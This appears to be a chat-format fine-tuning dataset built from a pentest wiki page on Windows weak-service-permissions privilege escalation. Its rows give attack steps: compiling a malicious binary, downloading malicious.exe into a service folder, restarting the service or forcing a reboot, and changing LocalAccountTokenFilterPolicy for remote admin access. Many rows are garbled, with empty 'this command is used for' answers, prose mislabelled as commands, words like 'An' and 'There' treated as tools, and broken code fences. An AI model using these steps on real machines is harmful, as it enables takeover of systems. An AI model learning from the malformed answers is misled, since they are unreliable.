"assistant", "content": "This command is used for 🛠️ weak service permissions - crafting a malicious binary. Crafting a malicious binary"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$`?", "response": "This command is used for 🛠️ weak service permissions - crafting a malicious binary. Crafting a malicious binary", "metadata": {"corpus_index": 1457, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Weak service permissions - Replacing binaries work?"}, {"role": "assistant", "content": "Due to the incorrect permissions, the attacker can replace the original executable by renaming it, for example. The attacker can then add the new malicious file with the same name as the original one.\n```powershell\n> move ani.exe ani.exe.bak"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Weak service permissions - Replacing binaries work?", "response": "Due to the incorrect permissions, the attacker can replace the original executable by renaming it, for example. The attacker can then add the new malicious file with the same name as the original one.\n```powershell\n> move ani.exe ani.exe.bak", "metadata": {"corpus_index": 1458, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Weak service permissions - Replacing binaries during a pentest?"}, {"role": "assistant", "content": "Due to the incorrect permissions, the attacker can replace the original executable by renaming it, for example. The attacker can then add the new malicious file with the same name as the original one.\n```powershell\n> move ani.exe ani.exe.bak"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Weak service permissions - Replacing binaries during a pentest?", "response": "Due to the incorrect permissions, the attacker can replace the original executable by renaming it, for example. The attacker can then add the new malicious file with the same name as the original one.\n```powershell\n> move ani.exe ani.exe.bak", "metadata": {"corpus_index": 1458, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is DOWNLOAD THE MALICIOUS EXECUTABLE?"}, {"role": "assistant", "content": "> iwr http:///malicious.exe -Outfile \"C:\\Program Files\\AniService\\ani.exe\"\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is DOWNLOAD THE MALICIOUS EXECUTABLE?", "response": "> iwr http:///malicious.exe -Outfile \"C:\\Program Files\\AniService\\ani.exe\"\n```", "metadata": {"corpus_index": 1459, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out DOWNLOAD THE MALICIOUS EXECUTABLE during a pentest?"}, {"role": "assistant", "content": "> iwr http:///malicious.exe -Outfile \"C:\\Program Files\\AniService\\ani.exe\"\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out DOWNLOAD THE MALICIOUS EXECUTABLE during a pentest?", "response": "> iwr http:///malicious.exe -Outfile \"C:\\Program Files\\AniService\\ani.exe\"\n```", "metadata": {"corpus_index": 1459, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Weak service permissions - Methods for service restart in the context of penetration testing"}, {"role": "assistant", "content": "Once the binary is replaced, the service needs to be restarted. To verify if this is possible, a tool from the Sysinternals suite can be helpful, accesschk.exe It is a tool that allows system administrators to quickly check the type of access users or specific groups have to resources, including files, directories, registry keys, global objects, and Windows services.\n``powershell\n> ./accesschk64.exe /accepteula -ucqv \n\nCopyright (C) 2006-2022 Mark Russinovich\nSysinternals - www.sysinternals.com\n\naniService\n Medium Mandatory Level (Default) [No-Write-Up]\n R DESKTOP-5VHCKF3\\admin\n SERVICE_PAUSE_CONTINUE\n SERVICE_START\n SERVICE_STOP\n`\nThe permissions that manage service startup are SERVICE_START and SERVICE_STOP. If these permissions are assigned to your user account or to a group that controls your access, you will be able to restart the service.\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Weak service permissions - Methods for service restart in the context of penetration testing", "response": "Once the binary is replaced, the service needs to be restarted. To verify if this is possible, a tool from the Sysinternals suite can be helpful, accesschk.exe It is a tool that allows system administrators to quickly check the type of access users or specific groups have to resources, including files, directories, registry keys, global objects, and Windows services.\n``powershell\n> ./accesschk64.exe /accepteula -ucqv \n\nCopyright (C) 2006-2022 Mark Russinovich\nSysinternals - www.sysinternals.com\n\naniService\n Medium Mandatory Level (Default) [No-Write-Up]\n R DESKTOP-5VHCKF3\\admin\n SERVICE_PAUSE_CONTINUE\n SERVICE_START\n SERVICE_STOP\n`\nThe permissions that manage service startup are SERVICE_START and SERVICE_STOP. If these permissions are assigned to your user account or to a group that controls your access, you will be able to restart the service.\n``powershell", "metadata": {"corpus_index": 1460, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Weak service permissions - Methods for service restart during a pentest?"}, {"role": "assistant", "content": "Once the binary is replaced, the service needs to be restarted. To verify if this is possible, a tool from the Sysinternals suite can be helpful, accesschk.exe It is a tool that allows system administrators to quickly check the type of access users or specific groups have to resources, including files, directories, registry keys, global objects, and Windows services.\n``powershell\n> ./accesschk64.exe /accepteula -ucqv \n\nCopyright (C) 2006-2022 Mark Russinovich\nSysinternals - www.sysinternals.com\n\naniService\n Medium Mandatory Level (Default) [No-Write-Up]\n R DESKTOP-5VHCKF3\\admin\n SERVICE_PAUSE_CONTINUE\n SERVICE_START\n SERVICE_STOP\n`\nThe permissions that manage service startup are SERVICE_START and SERVICE_STOP. If these permissions are assigned to your user account or to a group that controls your access, you will be able to restart the service.\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Weak service permissions - Methods for service restart during a pentest?", "response": "Once the binary is replaced, the service needs to be restarted. To verify if this is possible, a tool from the Sysinternals suite can be helpful, accesschk.exe It is a tool that allows system administrators to quickly check the type of access users or specific groups have to resources, including files, directories, registry keys, global objects, and Windows services.\n``powershell\n> ./accesschk64.exe /accepteula -ucqv \n\nCopyright (C) 2006-2022 Mark Russinovich\nSysinternals - www.sysinternals.com\n\naniService\n Medium Mandatory Level (Default) [No-Write-Up]\n R DESKTOP-5VHCKF3\\admin\n SERVICE_PAUSE_CONTINUE\n SERVICE_START\n SERVICE_STOP\n`\nThe permissions that manage service startup are SERVICE_START and SERVICE_STOP. If these permissions are assigned to your user account or to a group that controls your access, you will be able to restart the service.\n``powershell", "metadata": {"corpus_index": 1460, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the accesschk64.exe syntax for 🛠️ weak service permissions - methods for service restart?"}, {"role": "assistant", "content": "> ./accesschk64.exe /accepteula -ucqv \n\nCopyright (C) 2006-2022 Mark Russinovich\nSysinternals - www.sysinternals.com\n\naniService\n Medium Mandatory Level (Default) [No-Write-Up]\n R DESKTOP-5VHCKF3\\admin\n SERVICE_PAUSE_CONTINUE\n SERVICE_START\n SERVICE_STOP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the accesschk64.exe syntax for 🛠️ weak service permissions - methods for service restart?", "response": "> ./accesschk64.exe /accepteula -ucqv \n\nCopyright (C) 2006-2022 Mark Russinovich\nSysinternals - www.sysinternals.com\n\naniService\n Medium Mandatory Level (Default) [No-Write-Up]\n R DESKTOP-5VHCKF3\\admin\n SERVICE_PAUSE_CONTINUE\n SERVICE_START\n SERVICE_STOP", "metadata": {"corpus_index": 1461, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "accesschk64.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Weak service permissions - Methods for service restart"}, {"role": "assistant", "content": "> ./accesschk64.exe /accepteula -ucqv \n\nCopyright (C) 2006-2022 Mark Russinovich\nSysinternals - www.sysinternals.com\n\naniService\n Medium Mandatory Level (Default) [No-Write-Up]\n R DESKTOP-5VHCKF3\\admin\n SERVICE_PAUSE_CONTINUE\n SERVICE_START\n SERVICE_STOP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Weak service permissions - Methods for service restart", "response": "> ./accesschk64.exe /accepteula -ucqv \n\nCopyright (C) 2006-2022 Mark Russinovich\nSysinternals - www.sysinternals.com\n\naniService\n Medium Mandatory Level (Default) [No-Write-Up]\n R DESKTOP-5VHCKF3\\admin\n SERVICE_PAUSE_CONTINUE\n SERVICE_START\n SERVICE_STOP", "metadata": {"corpus_index": 1461, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> ./accesschk64.exe /accepteula -ucqv `?"}, {"role": "assistant", "content": "This command is used for 🛠️ weak service permissions - methods for service restart. Methods for service restart"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> ./accesschk64.exe /accepteula -ucqv `?", "response": "This command is used for 🛠️ weak service permissions - methods for service restart. Methods for service restart", "metadata": {"corpus_index": 1461, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does START SERVICE work?"}, {"role": "assistant", "content": "> net start \n``\nAn alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot.\n`powershell\n> sc.exe qc \n[SC] QueryServiceConfig réussite(s)\n\nSERVICE_NAME: aniService\n TYPE : 10 WIN32_OWN_PROCESS\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files\\AniService\\ani.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : Anakin Skywalker Service\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n`\nThere is a Windows privilege called SeShutdownPrivilege, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so.\n`powershell\n> shutdown /r /t 0\n``\nOnce the service is rebooted, the payload should execute."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does START SERVICE work?", "response": "> net start \n``\nAn alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot.\n`powershell\n> sc.exe qc \n[SC] QueryServiceConfig réussite(s)\n\nSERVICE_NAME: aniService\n TYPE : 10 WIN32_OWN_PROCESS\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files\\AniService\\ani.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : Anakin Skywalker Service\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n`\nThere is a Windows privilege called SeShutdownPrivilege, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so.\n`powershell\n> shutdown /r /t 0\n``\nOnce the service is rebooted, the payload should execute.", "metadata": {"corpus_index": 1462, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform START SERVICE?"}, {"role": "assistant", "content": "> net start \n``\nAn alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot.\n`powershell\n> sc.exe qc \n[SC] QueryServiceConfig réussite(s)\n\nSERVICE_NAME: aniService\n TYPE : 10 WIN32_OWN_PROCESS\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files\\AniService\\ani.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : Anakin Skywalker Service\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n`\nThere is a Windows privilege called SeShutdownPrivilege, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so.\n`powershell\n> shutdown /r /t 0\n``\nOnce the service is rebooted, the payload should execute."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform START SERVICE?", "response": "> net start \n``\nAn alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot.\n`powershell\n> sc.exe qc \n[SC] QueryServiceConfig réussite(s)\n\nSERVICE_NAME: aniService\n TYPE : 10 WIN32_OWN_PROCESS\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files\\AniService\\ani.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : Anakin Skywalker Service\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n`\nThere is a Windows privilege called SeShutdownPrivilege, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so.\n`powershell\n> shutdown /r /t 0\n``\nOnce the service is rebooted, the payload should execute.", "metadata": {"corpus_index": 1462, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use An for start service?"}, {"role": "assistant", "content": "An alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use An for start service?", "response": "An alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot.", "metadata": {"corpus_index": 1463, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "An"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform START SERVICE?"}, {"role": "assistant", "content": "An alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform START SERVICE?", "response": "An alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot.", "metadata": {"corpus_index": 1463, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `An alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot.`?"}, {"role": "assistant", "content": "This command is used for start service. START SERVICE"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `An alternative exists if the Startup permissions are not present. Using the sc.exe tool, the boot method used by the service can be checked. If it is set to AUTO_START, this means the service starts automatically during Windows boot.`?", "response": "This command is used for start service. START SERVICE", "metadata": {"corpus_index": 1463, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the There syntax for start service?"}, {"role": "assistant", "content": "There is a Windows privilege called **SeShutdownPrivilege**, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the There syntax for start service?", "response": "There is a Windows privilege called **SeShutdownPrivilege**, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so.", "metadata": {"corpus_index": 1464, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "There"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through START SERVICE"}, {"role": "assistant", "content": "There is a Windows privilege called **SeShutdownPrivilege**, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through START SERVICE", "response": "There is a Windows privilege called **SeShutdownPrivilege**, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so.", "metadata": {"corpus_index": 1464, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `There is a Windows privilege called **SeShutdownPrivilege**, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so.`?"}, {"role": "assistant", "content": "This command is used for start service. START SERVICE"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `There is a Windows privilege called **SeShutdownPrivilege**, which allows for rebooting a Windows system. With this privilege, it is possible to indirectly restart a service, even without having the direct permissions to do so.`?", "response": "This command is used for start service. START SERVICE", "metadata": {"corpus_index": 1464, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Weak service permissions - Configuring the LocalAccountTokenFilterPolicy in the context of penetration testing"}, {"role": "assistant", "content": "A small nuance when adding a local user: there is a registry key named LocalAccountTokenFilterPolicy that, when enabled, prevents users in the local Administrators group (except for those with a RID of 500, such as the built-in Administrator account) from obtaining full administrator rights during remote connections, such as to administrative shares like C$. To disable this restriction, the value of the key must be modified.\n``powershell\n> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Weak service permissions - Configuring the LocalAccountTokenFilterPolicy in the context of penetration testing", "response": "A small nuance when adding a local user: there is a registry key named LocalAccountTokenFilterPolicy that, when enabled, prevents users in the local Administrators group (except for those with a RID of 500, such as the built-in Administrator account) from obtaining full administrator rights during remote connections, such as to administrative shares like C$. To disable this restriction, the value of the key must be modified.\n``powershell\n> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1\n``", "metadata": {"corpus_index": 1465, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Weak service permissions - Configuring the LocalAccountTokenFilterPolicy?"}, {"role": "assistant", "content": "A small nuance when adding a local user: there is a registry key named LocalAccountTokenFilterPolicy that, when enabled, prevents users in the local Administrators group (except for those with a RID of 500, such as the built-in Administrator account) from obtaining full administrator rights during remote connections, such as to administrative shares like C$. To disable this restriction, the value of the key must be modified.\n``powershell\n> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Weak service permissions - Configuring the LocalAccountTokenFilterPolicy?", "response": "A small nuance when adding a local user: there is a registry key named LocalAccountTokenFilterPolicy that, when enabled, prevents users in the local Administrators group (except for those with a RID of 500, such as the built-in Administrator account) from obtaining full administrator rights during remote connections, such as to administrative shares like C$. To disable this restriction, the value of the key must be modified.\n``powershell\n> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1\n``", "metadata": {"corpus_index": 1465, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the reg command for 🛠️ weak service permissions - configuring the localaccounttokenfilterpolicy"}, {"role": "assistant", "content": "> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the reg command for 🛠️ weak service permissions - configuring the localaccounttokenfilterpolicy", "response": "> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1", "metadata": {"corpus_index": 1466, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "reg"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Weak service permissions - Configuring the LocalAccountTokenFilterPolicy?"}, {"role": "assistant", "content": "> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Weak service permissions - Configuring the LocalAccountTokenFilterPolicy?", "response": "> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1", "metadata": {"corpus_index": 1466, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1`?"}, {"role": "assistant", "content": "This command is used for 🛠️ weak service permissions - configuring the localaccounttokenfilterpolicy. Configuring the LocalAccountTokenFilterPolicy"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1`?", "response": "This command is used for 🛠️ weak service permissions - configuring 